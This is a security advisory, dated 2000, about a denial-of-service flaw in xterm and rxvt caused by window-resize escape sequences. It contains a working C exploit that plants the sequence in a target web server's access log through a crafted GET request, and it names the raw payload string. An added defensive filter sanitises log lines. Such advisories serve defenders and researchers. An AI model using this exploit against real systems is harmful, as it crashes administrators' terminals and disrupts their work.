xterm Special Control Character Denial of Service Vulnerability

Published: 2000-06-02
Updated: 2000-06-02

Affected systems:
xterm (XFree86 3.3.3.1b(88b))
rxvt v2.6.1
+ Linux

Unaffected systems:
KDE konsole 0.9.11
Secure CRT 3.0.x
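Description:
Sending VT control characters to xterm can cause it to crash. In some cases, rxvt may exhaust all available memory while processing these control characters. The result is a denial of service.
These control characters may be placed in files or banner messages on malicious sites, or in certain log files. When an administrator views such log files in xterm/rxvt with programs such as cat or tail, they may come under attack.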

<* Source: Kit Knox <kit@rootshell.com>  *>


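Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!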

/*
*
* xterm Denial of Service Attack
* (C) 2000 Kit Knox <kit@rootshell.com> - 5/31/2000
*
* Tested against: xterm (XFree86 3.3.3.1b(88b)  -- crashes
*                 rxvt v2.6.1 -- consumes all available memory and then
*                                crashes.
*
* Not vulnerable: KDE konsole 0.9.11
*                 Secure CRT 3.0.x
*
*
* By sending the VT control characters to resize a window it is possible
* to cause an xterm to crash and in some cases consume all available
* memory.
*
* This itself isn't much of a problem, except that remote users can inject
* these control characters into your xterm numerous ways including :
*
* o Directories and filenames on a rogue FTP servers.
* o Rogue banner messages on ftp, telnet, mud daemons.
* o Log files (spoofed syslog messages, web server logs, ftp server logs)
*
* This sample exploit injects these control characters into a web get
* request.  If an admin were to cat this log file, or happened to be doing
* a "tail -f access_log" at the time of attack they would find their
* xterm crash.
*
* Embedding "ESCAPE[4;65535;65535t" (where escape is the escape character)
* inside files, directories, etc will have the same effect as this code.
*
*/

#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

int sock;

int
main (int argc, char *argv[])
{
  struct hostent *he;
  struct sockaddr_in sa;
  char buf[1024];
  char packet[1024];
  int i;

  fprintf(stderr, "[ http://www.rootshell.com/ ] - xterm DoS attack - 05/31/2000.\n\n");
  if (argc != 2)
    {
      fprintf (stderr, "usage: %s <host/ip>\n", argv[0]);
      return (-1);
    }

  sock = socket (AF_INET, SOCK_STREAM, 0);
  sa.sin_family = AF_INET;
  sa.sin_port = htons (80);
  he = gethostbyname (argv[1]);
  if (!he)
    {
      if ((sa.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
        return (-1);
    }
  else
    {
      bcopy (he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
    }
  if (connect (sock, (struct sockaddr *) &sa, sizeof (sa)) < 0)
    {
      fprintf (stderr,
               "Fatal Error: Can't connect to web server.\n");
      return (-1);
    }
  sprintf(packet, "GET /\033[4;65535;65535t HTTP/1.0\n\n");
  write (sock, packet, strlen(packet));
  close (sock);
  fprintf(stderr, "Done.\n");
}
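
On the viewing side, log content can be made inert before it reaches the terminal. The filter below is an added example, not part of the original advisory or of Kit Knox's code: it flags lines carrying the `ESC[...t` window-manipulation sequence described above and rewrites control bytes in caret notation, as `cat -v` does. The function names and the sample request line are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* 1 if s holds ESC '[' digits/semicolons 't' (CSI window manipulation). */
int has_window_op(const char *s)
{
    for (const char *p = s; (p = strchr(p, 0x1b)) != NULL; p++) {
        const char *q = p + 1;
        if (*q++ != '[')
            continue;
        while ((*q >= '0' && *q <= '9') || *q == ';')
            q++;
        if (*q == 't')
            return 1;
    }
    return 0;
}

/* Copy in to out with C0 controls (except tab/newline) and DEL written in
 * caret notation, so ESC prints as "^[". Returns the count rewritten. */
size_t sanitize_line(const char *in, char *out, size_t outsz)
{
    size_t n = 0, o = 0;
    for (; outsz > 0 && *in != '\0'; in++) {
        unsigned char c = (unsigned char)*in;
        int ctl = (c < 0x20 && c != '\t' && c != '\n') || c == 0x7f;
        if (o + (ctl ? 2 : 1) >= outsz)
            break;                  /* truncate, never split a caret pair */
        if (ctl) {
            out[o++] = '^';
            c ^= 0x40;              /* 0x1b -> '[', 0x7f -> '?' */
            n++;
        }
        out[o++] = (char)c;
    }
    if (outsz > 0)
        out[o] = '\0';
    return n;
}

int main(void)
{
    char out[8192], in[4096] = "GET /\033[4;65535;65535t HTTP/1.0\n";
    do {                    /* constructed sample line first, then stdin */
        sanitize_line(in, out, sizeof out);
        printf("%s%s", has_window_op(in) ? "[window-op] " : "", out);
    } while (fgets(in, sizeof in, stdin) != NULL);
    return 0;
}
```

Bytes 0x80 and above pass through unchanged so UTF-8 text survives; a terminal running in 8-bit mode would also need the C1 control range filtered.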


Recommendation:
None at this time

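This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.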